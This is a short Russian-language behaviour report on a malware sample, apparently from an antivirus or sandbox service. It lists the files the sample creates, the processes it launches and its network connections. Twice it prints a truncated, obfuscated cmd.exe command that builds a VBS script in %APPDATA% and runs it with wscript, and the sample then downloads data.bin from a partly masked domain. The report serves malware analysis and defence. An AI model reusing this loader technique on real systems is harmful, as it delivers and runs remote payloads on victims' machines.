Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /V /C set "QxFNFJ=%APPDATA%\%RANDOM%.vbs" && (for %i in ("dIM A45r" "sUB LZ()" "A6p=76" "dIm Fm,D0by4" "BSQDEg=10" "Do WHilE Fm<>8526-8525" "D0by4=D0by4+1" "lOoP" "V3L6Yyb=74" "eNd SUb" "DE=89"...
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\21225.vbs
Сетевая активность
Подключается к
- 'pa###louf.com':80
- '20#.#7.8.251':80
TCP
Запросы HTTP GET
- http://pa###louf.com/data.bin
UDP
- DNS ASK pa###louf.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\wscript.exe' "%APPDATA%\21225.vbs"
- '<SYSTEM32>\cmd.exe' /V /C set "QxFNFJ=%APPDATA%\%RANDOM%.vbs" && (for %i in ("dIM A45r" "sUB LZ()" "A6p=76" "dIm Fm,D0by4" "BSQDEg=10" "Do WHilE Fm<>8526-8525" "D0by4=D0by4+1" "lOoP" "V3L6Yyb=74" "eNd SUb" "DE=89"...' (со скрытым окном)
